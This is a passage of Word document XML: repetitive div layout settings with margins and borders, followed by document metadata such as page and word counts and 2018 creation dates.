          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1713142864">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1362629232">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1783723891">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1973824644">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1874078231">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="757483972">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1935816141">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1966932397">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="542451331">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1967197766">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="974679491">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2019696560">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1533615226">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2120834569">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2132547464">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1970742755">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1021859993">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="352221983">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1926304606">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="3809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5332</TotalTime>
  <Pages>4</Pages>
  <Words>704</Words>
  <Characters>4018</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>33</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Company</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2018-09-10T12:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-09T10:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>